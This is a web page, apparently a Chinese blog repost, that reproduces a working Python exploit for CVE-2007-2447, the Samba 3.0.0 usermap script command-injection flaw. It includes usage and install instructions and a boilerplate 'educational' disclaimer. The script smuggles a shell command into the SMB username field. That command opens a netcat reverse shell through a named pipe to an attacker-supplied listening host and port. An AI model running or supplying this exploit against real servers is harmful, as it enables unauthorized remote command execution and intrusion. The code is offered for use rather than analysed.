# CVE-2007-2447 Samba 3.0.0任意命令執行漏洞
==INFO==
CVE-2007-2447 ==== CVE-2007-2447 - Samba usermap script. https://amriunix.com/post/cve-2007-2447-samba-usermap-script/ ## Usage: ```shell $ python usermap_script.py``` * `RHOST` -- The target address * `RPORT` -- The target port (TCP : 139) * `LHOST` -- The listen address * `LPORT` -- The listen port ## Installation sudo apt install python python-pip pip install --user pysmb git clone https://github.com/amriunix/CVE-2007-2447.git ### Disclaimer: All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.
==usermap_sctipt.py==
#!/usr/bin/python
# -*- coding: utf-8 -*-
# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
import sys
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0/tmp/hago 2>&1; rm /tmp/hago'
username = "/=`nohup " + payload + "`"
conn = SMBConnection(username, "", "", "")
try:
conn.connect(rhost, int(rport), timeout=1)
except:
print("[+] Payload was sent - check netcat !")
if __name__ == '__main__':
print("[*] CVE-2007-2447 - Samba usermap script")
if len(sys.argv) != 5:
print("[-] usage: python " + sys.argv[0] + " ")
else:
print("[+] Connecting !")
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
exploit(rhost, rport, lhost, lport)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容